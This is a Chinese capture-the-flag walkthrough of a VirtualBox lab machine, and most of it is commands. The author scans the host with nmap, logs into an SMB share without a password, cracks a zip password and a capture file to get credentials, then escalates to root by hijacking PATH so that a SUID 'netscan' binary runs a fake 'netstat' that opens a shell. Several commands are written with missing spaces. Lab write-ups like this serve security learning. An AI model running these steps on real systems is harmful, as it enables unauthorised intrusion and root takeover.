首先将kali桥接到virtualbox的网卡上。打开kali查看本机ip然后nmap搜索同一网段下有哪些ip。nmap -sP 192.168.56.1/24
然后打开靶机,用kali再扫一遍,发现多出一个ip,就是靶机的ip了,靶机ip为:192.168.56.101
用namp查询靶机的开放端口,,查询到80,139.445.2525端口是开放的
然后进入网站观察有无漏洞,192.168.56.101:80
除了几张图片就没有什么收获,于是去百度搜索其他端口的漏洞
139和445有名的就是那个永恒之蓝也是smb漏洞,但这是Ubuntu不是windows所以,经百度查询输入命令:mbclient//192.168.56.101/myshare -U smb直接进入,无密码,得到两个文件,下载到本地解压但是需要密码,于是用fcrackzip爆破,得到zip密码hacker1
解压得到文件secret.jpg和user.cap,图片没什么东西,使用aircrack-ng破解user.cap文件。得到用户名和密码。用这个账号密码登入靶机,得到user.txt,打开得到第一个flag,user.flag
第二个root.flag就是需要提升权限去获得了,再度娘寻找大部分linux提权的文章,找到一篇与我此刻情况差不多的文章https://www.anquanke.com/post/id/146799
按照作者的方法走,在find命令的帮助下不浪费时间的搜索具有SUID或4000权限的文件。find / -perm -u=s -type f2>/dev/null
然后我们进入/usr/bin,看到netscan比较可疑,运行这个文件,在这里它看起来像文件netscan试图运行netstat,在查看端口状态。再提权
cd/tmp
echo"/bin/sh"> netstat (创建文件netstat)
chmod 777 netstat
echo$PATH (查看当前环境变量)
export PATH=/tmp:$PATH (设置环境变量PATH)
cd/usr/bin
./netscan
whoami
root
此时已经变成root权限,进入root目录,ls查看所有文件发现有个root.txt.这就是另一个flag了